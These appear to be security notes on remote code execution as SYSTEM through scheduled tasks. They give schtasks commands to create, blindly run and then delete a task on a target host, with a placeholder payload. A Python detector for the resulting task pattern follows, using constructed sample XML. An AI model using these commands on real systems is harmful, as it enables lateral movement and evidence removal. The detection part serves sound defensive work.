Requirements

- Administrator privileges on remote machine (i.e. domain admin)
- Ports: 135/TCP, 49152-65535/TCP (RPC)

```
# Since the task will be run manually, /sd and /st do not matter
schtasks /s TARGET /RU "SYSTEM" /create /tn "TaskName" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "TaskName"  # blind (no output returned)
schtasks /S TARGET /TN "TaskName" /DELETE /F  # clean-up
```
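For defenders, a task created with the options above has a recognisable definition: it runs as SYSTEM and its only trigger is a one-time start that is already in the past. The Python below is an added example, not part of the original notes; it checks task XML, such as the TaskContent field of Security event 4698 (logged when "Audit Other Object Access Events" is enabled), for that shape. The sample XML, SID and timestamps are constructed, and the name `audit_task` is hypothetical.

```python
import xml.etree.ElementTree as ET
from datetime import datetime

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumption: SYSTEM may be recorded as its SID or by name in the task XML.
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}

def audit_task(task_xml, created):
    """Return the reasons a task definition matches the pattern in the notes."""
    root = ET.fromstring(task_xml)
    findings = []
    users = [u.text.strip().lower()
             for u in root.iterfind(".//t:Principal/t:UserId", NS) if u.text]
    if any(u in SYSTEM_IDS for u in users):
        findings.append("runs as SYSTEM")
    triggers = root.find("t:Triggers", NS)
    kinds = [] if triggers is None else [el.tag.rsplit("}", 1)[-1] for el in triggers]
    # /sc ONCE yields a single TimeTrigger; a start date before the creation
    # time means the task can never fire on schedule and must be run by hand.
    if kinds == ["TimeTrigger"]:
        start = triggers.find("t:TimeTrigger/t:StartBoundary", NS)
        if start is not None and start.text:
            when = datetime.fromisoformat(start.text.strip()[:19])
            if when < created:
                findings.append("one-time trigger already in the past")
    return findings

# Constructed samples: the first mirrors /RU SYSTEM /sc ONCE /sd 01/01/1970.
SUSPICIOUS = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>1970-01-01T00:00:00</StartBoundary></TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>placeholder.exe</Command></Exec></Actions>
</Task>"""
BENIGN = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-05-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author">
    <UserId>S-1-5-21-1111111111-2222222222-3333333333-1104</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>backup.exe</Command></Exec></Actions>
</Task>"""
CREATED = datetime(2024, 5, 1, 9, 30)  # constructed event timestamp

if __name__ == "__main__":
    for name, xml in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, audit_task(xml, CREATED))
```

Neither finding is conclusive on its own, so treat a match as a reason to look at who created the task and from where.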